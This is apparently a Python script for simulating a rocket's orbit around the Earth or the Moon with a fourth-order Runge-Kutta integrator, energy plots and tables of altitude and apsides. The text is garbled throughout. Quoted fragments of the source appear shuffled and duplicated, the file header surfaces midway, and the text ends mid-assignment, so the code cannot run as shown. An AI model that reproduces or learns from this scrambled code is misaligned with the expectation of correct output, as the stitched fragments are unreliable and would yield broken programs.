apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))])", "= 7500)\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \") print('''", "ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0], rM,", "np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11", "k2x * 0.5, y[i] + h * k2y * 0.5) k3vy = F4(x[i]", "'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the", "ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0], rM, color", "10:37:05 2020 @author: Alex \"\"\" import numpy as np import matplotlib.pyplot as plt", "energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total", "Earth and the Moon (m) #dx/dt def F1(vx): return vx #dy/dt def F2(vy):", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0", "def F3(x,y): return -1 * (Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt", "k2vy) k3vx = F5(x[i] + h * k2x * 0.5, y[i] + h", "F6(x[i] + h * k1x * 0.5, y[i] + h * k1y *", "or 2): \\n 1. Earth \\n 2. Moon\"\"\") choice = input() if choice", "prettytable import PrettyTable G = 6.674e-11 Me = 5.972e24 #mass of the Earth", "+ 2 * k2x + 2 * k3x + k4x) y[i+1] = y[i]", "= F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] +", "* 0.5, y[i] + h * k1y * 0.5) #3 k3x = F1(vx[i]", "variable 'r' v = np.hypot(vx,vy) # Velocities in the x and y directions", "np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] =", "* k3y) k4vy = F4(x[i] + h * k3x, y[i] + h *", "of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal')", "* k3x, y[i] + h * k3y) x[i+1] = x[i] + (h/6) *", "* k2vx + 2 * k3vx +k4vx) vy[i+1] = vy[i] + (h/6) *", "ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label =", "+ k4y) vx[i+1] = vx[i] + (h/6) * (k1vx + 2 * k2vx", "+ (h/6) * (k1vx + 2 * k2vx + 2 * k3vx +k4vx)", "* 0.5, y[i] + h * k2y * 0.5) k3vy = F4(x[i] +", "* G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y * G) /", "and y coordinates compounded in a single position variable 'r' v = np.hypot(vx,vy)", "k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] + h *", "y[i] + h * k3y) k4vy = F4(x[i] + h * k3x, y[i]", "ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth)", "label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total Energy', color", "= Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above", "above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket", "1 or 2): \\n 1. Earth \\n 2. Moon\"\"\") choice = input() if", "enter initial velocities along the x and y axis (units are in m/s)", "* k1vy) k2vx = F3(x[i] + h * k1x * 0.5, y[i] +", "# Ek, Ep and total energy of the rocket for i+1 iterations Ep[i+1]", "of the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] +", "(((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def F6(x,y): return (-1*(Mm * y", "h * k2x * 0.5, y[i] + h * k2y * 0.5) #4", "= x[i] + (h/6) * (k1x + 2 * k2x + 2 *", "(m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement')", "F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] + h", "Calculating orbit... ''') h = 1 N=int(t1-t0/h) x, y, vx, vy, t, Ek,", "y[i] + h * k3y) k4vy = F6(x[i] + h * k3x, y[i]", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0 vx[0]", "coordinates for your rocket:\"\"\") x0 = input(\"x = \") y0 = input(\"y =", "orbit (enter 1 or 2): \\n 1. Earth \\n 2. Moon\"\"\") choice =", "(k1vy + 2 * k2vy + 2 * k3vy + k4vy) t[i+1] =", "'teal') moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots()", "+ (-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence", "these two # Part A RK4 Implementation for i in range (0, N-1):", "Welcome to Alex's Rocket Orbit Simulator! Please select which body you wish your", "ax4.set_title('Energy analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek,", "N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy =", "x, y, vx, vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "= 'cyan') ax4.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax4.legend() plt.show() Exercise_4()", "= input(\"y = \") # Starting Velocities (x,y) print(\"\"\" Please enter initial velocities", "in a single position variable 'r' v = np.hypot(vx,vy) # Velocities in the", "rM = 1.737e6 #radius of the moon (m) d = 3.844e8 # Distance", "= vx0 vy[0] = vy0 r = np.hypot(x,y) # x and y coordinates", "= input(\"Vy = \") print(''' Calculating orbit... ''') h = 1 N=int(t1-t0/h) x,", "+ h * k1y * 0.5) k2vy = F4(x[i] + h * k1x", "\"Your rocket has crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\")", "Please enter initial velocities along the x and y axis\"\"\") vx0 = input(\"Vx", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates", "vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "= F4(x[i] + h * k2x * 0.5, y[i] + h * k2y", "np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential", "#mass of the Moon (kg) Mr = 5e3 #mass of the rocket (kg)", "\") # Starting Velocities (x,y) print(\"\"\" Please enter initial velocities along the x", "vx0 vy[0] = vy0 r = np.hypot(x,y) # x and y coordinates compounded", "* k1x * 0.5, y[i] + h * k1y * 0.5) #3 k3x", "2 * k3vy + k4vy) t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1])", "7500)\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating", "= F3(x[i] + h * k3x, y[i] + h * k3y) k4vy =", "#Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0]", "+ h * k3x, y[i] + h * k3y) k4vy = F6(x[i] +", "= vy[i] + (h/6) * (k1vy + 2 * k2vy + 2 *", "= F6(x[i] + h * k3x, y[i] + h * k3y) x[i+1] =", "k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx)", "'Potential Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total Energy', color = '#F700FF')", "\") print(''' Calculating orbit... ''') x[0] = x0 y[0] = y0 vx[0] =", "= 0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! Please", "color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a", "\"\"\" import numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import", "k1y * 0.5) k2vy = F4(x[i] + h * k1x * 0.5, y[i]", "* G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x * G) /", "choice == \"2\": h = 50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep,", "((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4():", "\\n 2. Moon\"\"\") choice = input() if choice == \"1\": # Starting Coordinates", "= F6(x[i] + h * k1x * 0.5, y[i] + h * k1y", "2 * k2y + 2 * k3y + k4y) vx[i+1] = vx[i] +", "np.hypot(vx,vy) # Velocities in the x and y directions compounded in single variable", "velocities along the x and y axis\"\"\") vx0 = input(\"Vx = \") vy0", "Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon", "plt plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11 Me = 5.972e24 #mass", "(m) #dx/dt def F1(vx): return vx #dy/dt def F2(vy): return vy #dvx/dt def", "F2(vy[i] + h * 0.5 * k1vy) k2vx = F3(x[i] + h *", "x = 7x10^6 and y = 0)\"\"\") x0 = input(\"x = \") y0", "crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides", "(1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy", "t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2)", "= 5.972e24 #mass of the Earth (kg) rE = 6.371e6 #radius of earth", "orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red')", "* k3vy) k4vx = F5(x[i] + h * k3x, y[i] + h *", "= PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3", "k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] + h *", "F1(vx): return vx #dy/dt def F2(vy): return vy #dvx/dt def F3(x,y): return -1", "k1x * 0.5, y[i] + h * k1y * 0.5) k2vy = F6(x[i]", "enter initial velocities along the x and y axis\"\"\") vx0 = input(\"Vx =", "your rocket to orbit (enter 1 or 2): \\n 1. Earth \\n 2.", "y directions compounded in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0])", "F5(x[i] + h * k1x * 0.5, y[i] + h * k1y *", "import PrettyTable G = 6.674e-11 Me = 5.972e24 #mass of the Earth (kg)", "Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0", "* k3x + k4x) y[i+1] = y[i] + (h/6) * (k1y + 2", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for your rocket:\"\"\") x0", "= plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy", "= F5(x[i] + h * k1x * 0.5, y[i] + h * k1y", "altitude is set then start with x = 0, y = 7500)\"\"\") vx0", "(((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def F5(x,y): return (-1*(Mm * (x-d)", "0.5, y[i] + h * k2y * 0.5) k3vy = F4(x[i] + h", "(I reccommend starting with x = 7x10^6 and y = 0)\"\"\") x0 =", "y[i] + h * k3y) x[i+1] = x[i] + (h/6) * (k1x +", "including influence of the Moon def F5(x,y): return (-1*(Mm * (x-d) * G)", "x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def F6(x,y):", "k3y) x[i+1] = x[i] + (h/6) * (k1x + 2 * k2x +", "earth (m) Mm = 7.348e22 #mass of the Moon (kg) Mr = 5e3", "-Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum", "to orbit (enter 1 or 2): \\n 1. Earth \\n 2. Moon\"\"\") choice", "* (k1y + 2 * k2y + 2 * k3y + k4y) vx[i+1]", "(x,y) print(\"\"\" Please enter initial velocities along the x and y axis\"\"\") vx0", "G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2)))", "(0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy", "variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic", "Simulator! Please select which body you wish your rocket to orbit (enter 1", "velocities along the x and y axis (units are in m/s) (If the", "i in range (0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for your", "of these two # Part A RK4 Implementation for i in range (0,", "initial velocities along the x and y axis\"\"\") vx0 = input(\"Vx = \")", "(((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me * y * G) /", "vx[0] = vx0 vy[0] = vy0 r = np.hypot(x,y) # x and y", "np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total", "= \") # Starting Velocities (x,y) print(\"\"\" Please enter initial velocities along the", "plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek,", "plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color =", "0.5 * k1vx) k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx", "fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy", "k2vy = F4(x[i] + h * k1x * 0.5, y[i] + h *", "h * k1y * 0.5) k2vy = F6(x[i] + h * k1x *", "#Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of the rocket", "and y axis (units are in m/s) (If the previously reccommended altitude is", "* (k1x + 2 * k2x + 2 * k3x + k4x) y[i+1]", "'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2", "#dx/dt def F1(vx): return vx #dy/dt def F2(vy): return vy #dvx/dt def F3(x,y):", "Moon (m) #dx/dt def F1(vx): return vx #dy/dt def F2(vy): return vy #dvx/dt", "* k1y * 0.5) k2vy = F4(x[i] + h * k1x * 0.5,", "vy0 r = np.hypot(x,y) # x and y coordinates compounded in a single", "0.5 * k1vy) k2vx = F5(x[i] + h * k1x * 0.5, y[i]", "<gh_stars>0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Wed Mar", "k2vy + 2 * k3vy + k4vy) t[i+1] = t[i] + h r[i+1]", "Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax2.legend()", "(m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE,", "Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of the rocket for", "k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx = F5(x[i] +", "Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),])", "k3y) k4vy = F6(x[i] + h * k3x, y[i] + h * k3y)", "# x and y coordinates compounded in a single position variable 'r' v", "print(\"\"\" Please enter initial velocities along the x and y axis\"\"\") vx0 =", "= vy0 t[0] = 0 r = np.hypot(x,y) # x and y coordinates", "* k2y + 2 * k3y + k4y) vx[i+1] = vx[i] + (h/6)", "h * 0.5 * k1vx) k2y = F2(vy[i] + h * 0.5 *", "Ek[i+1] + Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your rocket has crashed!\"\"\")", "the Earth (kg) rE = 6.371e6 #radius of earth (m) Mm = 7.348e22", "np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential", "+ (h/6) * (k1x + 2 * k2x + 2 * k3x +", "1 N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N),", "color = 'cyan') ax4.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax4.legend() plt.show()", "vx, vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "rocket (kg) rM = 1.737e6 #radius of the moon (m) d = 3.844e8", "t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! Please select which", "(0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy", "2 * k3x + k4x) y[i+1] = y[i] + (h/6) * (k1y +", "if choice == \"2\": h = 50 N=int(t1-t0/h) x, y, vx, vy, Ek,", "* G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me * y", "your rocket (units are in m): (I reccommend starting with x = 7x10^6", "F4(x[i] + h * k1x * 0.5, y[i] + h * k1y *", "\"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates for your rocket", "Wed Mar 4 10:37:05 2020 @author: Alex \"\"\" import numpy as np import", "k1x * 0.5, y[i] + h * k1y * 0.5) #3 k3x =", "ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label", "Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please", "k4y = F2(vy[i] + h * k3vy) k4vx = F5(x[i] + h *", "m): (I reccommend starting with x = 7x10^6 and y = 0)\"\"\") x0", "the Moon (m) #dx/dt def F1(vx): return vx #dy/dt def F2(vy): return vy", "t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter", "* k2y * 0.5) k3vy = F6(x[i] + h * k2x * 0.5,", "k4vx = F3(x[i] + h * k3x, y[i] + h * k3y) k4vy", "(kg) Mr = 5e3 #mass of the rocket (kg) rM = 1.737e6 #radius", "from prettytable import PrettyTable G = 6.674e-11 Me = 5.972e24 #mass of the", "F3(x,y): return -1 * (Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def", "-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of", "np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for your rocket:\"\"\") x0 = input(\"x", "in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] =", "iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude", "rE, color = 'teal') moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon)", "# Velocities in the x and y directions compounded in single variable 'v'", "* k1y * 0.5) k2vy = F6(x[i] + h * k1x * 0.5,", "k1vx) k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx = F5(x[i]", "and total energy of the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1]", "along the x and y axis (units are in m/s) (If the previously", "h = 50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et, t =", "2): \\n 1. Earth \\n 2. Moon\"\"\") choice = input() if choice ==", "ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color =", "+ 2 * k3vy + k4vy) t[i+1] = t[i] + h r[i+1] =", "= F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x", "(-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your", "(m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth')", "F5(x[i] + h * k2x * 0.5, y[i] + h * k2y *", "Me = 5.972e24 #mass of the Earth (kg) rE = 6.371e6 #radius of", "vy0 t[0] = 0 r = np.hypot(x,y) # x and y coordinates compounded", "k3y + k4y) vx[i+1] = vx[i] + (h/6) * (k1vx + 2 *", "np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of the", "F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] + h", "vx[0] = vx0 vy[0] = vy0 t[0] = 0 r = np.hypot(x,y) #", "label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color", "(k1x + 2 * k2x + 2 * k3x + k4x) y[i+1] =", "k4vy = F4(x[i] + h * k3x, y[i] + h * k3y) x[i+1]", "(m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position", "import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11 Me", "h * 0.5 * k2vy) k3vx = F5(x[i] + h * k2x *", "* (Me * y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0", "Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude above", "of earth (m) Mm = 7.348e22 #mass of the Moon (kg) Mr =", "vy #dvx/dt def F3(x,y): return -1 * (Me * x * G) /", "k3x = F1(vx[i] + h * 0.5 * k2vx) k3y = F2(vy[i] +", "(m) d = 3.844e8 # Distance between Earth and the Moon (m) #dx/dt", "* k2y * 0.5) #4 k4x = F1(vx[i] + h * k3vx) k4y", "color = 'teal') moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4", "d = 3.844e8 # Distance between Earth and the Moon (m) #dx/dt def", "vx #dy/dt def F2(vy): return vy #dvx/dt def F3(x,y): return -1 * (Me", "including influence of the Moon def F6(x,y): return (-1*(Mm * y * G)", "Exercise_4() if choice == \"2\": h = 50 N=int(t1-t0/h) x, y, vx, vy,", "#Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum of", "= 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label =", "F1(vx[i] + h * 0.5 * k1vx) k2y = F2(vy[i] + h *", "Please enter initial coordinates for your rocket (units are in m): (I reccommend", "reccommend starting with x = 7x10^6 and y = 0)\"\"\") x0 = input(\"x", "above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon')", "ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal')", "Mar 4 10:37:05 2020 @author: Alex \"\"\" import numpy as np import matplotlib.pyplot", "7x10^6 and y = 0)\"\"\") x0 = input(\"x = \") y0 = input(\"y", "h * 0.5 * k2vx) k3y = F2(vy[i] + h * 0.5 *", "vx, vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "k3vy = F6(x[i] + h * k2x * 0.5, y[i] + h *", "Ek[0]+Ep[0] #Total energy is the sum of these two # Part A RK4", "for your rocket:\"\"\") x0 = input(\"x = \") y0 = input(\"y = \")", "ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)')", "ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time", "= x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 t[0] =", "* 0.5 * k2vy) k3vx = F3(x[i] + h * k2x * 0.5,", "= 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color =", "+ h * k2y * 0.5) k3vy = F6(x[i] + h * k2x", "= F1(vx[i] + h * 0.5 * k1vx) k2y = F2(vy[i] + h", "= t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] =", "ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total Energy',", "'cyan') ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if", "apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots()", "+ k4vy) t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1])", "print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement')", "= input() if choice == \"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for your rocket:\"\"\")", "'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\": h", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0 vx[0] =", "Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\"", "k3x, y[i] + h * k3y) x[i+1] = x[i] + (h/6) * (k1x", "+ h * k3y) k4vy = F6(x[i] + h * k3x, y[i] +", "ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red')", "F2(vy[i] + h * 0.5 * k2vy) k3vx = F5(x[i] + h *", "select which body you wish your rocket to orbit (enter 1 or 2):", "k2y * 0.5) #4 k4x = F1(vx[i] + h * k3vx) k4y =", "coding: utf-8 -*- \"\"\" Created on Wed Mar 4 10:37:05 2020 @author: Alex", "y[0] = y0 vx[0] = vx0 vy[0] = vy0 t[0] = 0 r", "\"\"\" Created on Wed Mar 4 10:37:05 2020 @author: Alex \"\"\" import numpy", "h * k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F3(x[i]", "input(\"y = \") # Starting Velocities (x,y) print(\"\"\" Please enter initial velocities along", "= 1 N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep, Et = np.zeros(N),", "0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of the rocket for i+1 iterations", "Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax4.legend()", "= 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label =", "F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x =", "(s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label", "= 0 r = np.hypot(x,y) # x and y coordinates compounded in a", "x[i] + (h/6) * (k1x + 2 * k2x + 2 * k3x", "= 